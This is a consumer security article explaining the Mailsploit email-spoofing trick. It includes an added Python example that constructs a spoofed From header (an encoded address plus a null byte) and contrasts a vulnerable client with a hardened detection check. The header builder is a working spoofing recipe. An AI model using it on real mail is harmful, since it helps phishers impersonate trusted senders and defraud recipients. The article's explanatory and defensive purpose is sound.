In phishing, emails are the bait and you are the dinner. Mailsploit is a new trick that makes spoofed emails all but unstoppable until the affected mail clients are patched. Read this article to help you stay safe!
Phishing is a big deal. How big? Well, it’s the most common form of cyber attack by far, with, by some estimates, more than a billion phishing emails sent every day. The basic phishing scheme is an email that pretends to be something it isn’t, like a message from Amazon saying you need to verify your information, or a Middle-Eastern prince wanting to send you $10,000.
In order to not fall prey to phishing schemes you’ve got to keep a sharp eye, and always keep your guard up! Don’t trust any email you’re not expecting, and don’t open any attachment you’re not waiting for. But what happens when you get an email from your boss? Can you trust it?
It’s a hard question to answer, and it just got harder. A security researcher has found a way to make an email appear, in your mail client, to come from any address at all. You could receive a message that looks like it came from the President’s own address, sent by someone totally random and malicious, and neither you nor the President would ever know.
The hack is being called Mailsploit, and it is about to pwn a lot of inboxes. So much so that the researcher who found it, Sabri Haddouche, said Mailsploit “makes these spoofed emails virtually unstoppable at this point in time.”
How Does it Work?
Usually, mail servers are pretty good at figuring out who’s who. The newest layer is called Domain-based Message Authentication, Reporting, and Conformance (DMARC). It builds on SPF and DKIM: a domain owner can tell receiving servers to quarantine or reject any message whose From domain isn’t backed by a passing SPF or DKIM check for that same domain. So an attacker can’t simply write a real bank’s domain into the From header. That is why today’s phishers fall back on lookalike domains (a letter swapped, an extra hyphen) to fool the end user, and if you read the address carefully you can usually spot that.
Mailsploit, on the other hand, gets past DMARC without breaking it and makes the message look like it came from a legitimate domain. It doesn’t hack anyone’s mail account. The message really is sent from a domain the attacker controls, so SPF, DKIM and DMARC all pass; the trick is in how the From header is written. Mail headers have a standard way of encoding non-ASCII text, and Mailsploit uses that encoding to hide a spoofed address followed by a null byte (or a newline) inside the header, with the attacker’s real domain at the end in plain text. The server checks the real domain. The mail client decodes the header for display, its string handling stops at the null byte, and the user sees only the spoofed address. Dan Kaminsky, a security researcher from WhiteOps said, “The cleverness of this attack is that everything comes from the right source from the perspective of the mail server, but at the moment it’s displayed to the user it comes from someone else.”
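To make the mechanism concrete, here is a small Python model of the trick. This is an added example, not code from the original article or from Haddouche’s disclosure. The header layout follows the pattern Mailsploit used (RFC 2047 encoded words whose decoded value contains a null byte), but the addresses `ceo@example.com`, `jose@example.com` and the domain `attacker.example` are made up, and the two “client” functions are simplified simulations of vulnerable and fixed behaviour, not any real mail client’s code.

```python
import base64
import quopri
import re

# RFC 2047 "encoded word": =?charset?encoding?payload?=
ENCODED_WORD = re.compile(r"=\?([^?]+)\?([bBqQ])\?([^?]*)\?=")
# ASCII control characters, including NUL (0x00), LF (0x0a) and CR (0x0d)
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def decode_encoded_words(header: str) -> str:
    """Expand every encoded word in a header value (minimal RFC 2047 decoder)."""
    def expand(match):
        charset, encoding, payload = match.group(1), match.group(2).upper(), match.group(3)
        if encoding == "B":
            raw = base64.b64decode(payload)
        else:  # "Q": quoted-printable, header variant ("_" means space)
            raw = quopri.decodestring(payload.encode("ascii"), header=True)
        return raw.decode(charset, errors="replace")
    return ENCODED_WORD.sub(expand, header)


def mailsploit_style_from(spoofed_address: str, attacker_domain: str) -> str:
    """Constructed From header in the Mailsploit pattern (example, not a real message).

    The spoofed address is hidden in a base64 encoded word, followed by a
    Q-encoded NUL byte (=00), followed by the attacker's real domain in the
    clear. A receiving server sees a mailbox at attacker_domain, which the
    attacker really controls, so SPF/DKIM/DMARC all pass.
    """
    b64 = base64.b64encode(spoofed_address.encode("utf-8")).decode("ascii")
    return f"=?utf-8?b?{b64}?==?utf-8?Q?=00?=@{attacker_domain}"


def naive_client_sender(from_header: str) -> str:
    """Model of a vulnerable client: decode the header, then hand the text to
    NUL-terminated string code, which stops at the first NUL byte."""
    decoded = decode_encoded_words(from_header)
    return decoded.split("\x00", 1)[0]


def hardened_client_sender(from_header: str) -> dict:
    """Model of a fixed client or gateway check.

    Decoded header text must not contain control characters (flagged as
    suspicious and rendered visibly), and the domain shown to the user is
    taken from the raw header, i.e. the same domain the server authenticated,
    never from the decoded display text.
    """
    decoded = decode_encoded_words(from_header)
    suspicious = CONTROL_CHARS.search(decoded) is not None
    domain = from_header.rsplit("@", 1)[-1].strip().rstrip(">")
    return {
        "display": CONTROL_CHARS.sub("\ufffd", decoded),
        "domain": domain,
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    # Constructed example addresses; none of these are real mailboxes.
    evil = mailsploit_style_from("ceo@example.com", "attacker.example")
    print("raw header:     ", evil)
    print("naive client:   ", naive_client_sender(evil))
    print("hardened client:", hardened_client_sender(evil))
    benign = "=?utf-8?Q?Jos=C3=A9_Silva?= <jose@example.com>"
    print("benign header:  ", hardened_client_sender(benign))
```

Run it and the naive client reports the sender as `ceo@example.com`, while the hardened check shows the authenticated domain `attacker.example` and flags the header. The same check catches the newline variant (`=0A` instead of `=00`), which is why the control-character filter is applied to the whole decoded value rather than looking only for NUL.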
Are We in Trouble?
Are we going to start seeing emails from President Trump appointing us to be the next ambassador to Libya? How can we be sure whether any email is genuine? Thankfully, Haddouche, the researcher who found the exploit, notified the affected vendors “months ago,” and most say they are working on a fix. Whether patches have actually been released yet is the question.
The real problem is that email authentication isn’t where it needs to be. Security features like DMARC were built to fight spam, not targeted phishing. “This is all part of the goop of email being a ’90s protocol before security was a big deal,” Kaminsky says. “The system that accidentally prevents you from pretending to be the president of the US is good enough for spam protection, but it’s not good enough for phishing protection.”
The takeaway from this article: Be wary of email. It’s a useful tool, but you can’t believe everything you read. Check out this other article for more information about phishing, and stay safe out there!